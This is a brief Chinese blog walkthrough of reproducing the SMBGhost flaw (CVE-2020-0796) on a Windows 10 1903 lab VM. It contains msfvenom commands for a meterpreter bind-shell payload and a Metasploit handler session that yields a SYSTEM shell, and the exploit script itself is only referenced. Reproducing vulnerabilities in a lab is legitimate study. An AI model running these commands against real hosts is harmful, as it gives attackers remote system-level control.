CVE-2020-0796复现
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
·
简单来说,适合内网渗透,除非有人把win10放在了公网上。
危害:拿到shell和系统权限。
利用难度:简单。
1、受影响的系统版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
复现的话,推荐用这个镜像。
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/
进去之后把windows防护墙关掉。
2、复现
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o evil.py
生成evil.py,把buf变量改成USER_PAYLOAD,同时,将每行前面加入b,代表byte,后面脚本没有这个会报错。
然后将启动msf,进行监听。
msf > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set rhost 172.16.230.165
rhost => 172.16.230.165
msf5 exploit(multi/handler) > exploit
运行脚本,使用python3。
执行完毕之后,靶机电脑会要求重启。
然后我们这边就会获得一个带有系统权限的shell。
3、总结
没啥总结的,动起手来是王道。
脚本在这。
更多推荐
已为社区贡献1条内容
所有评论(0)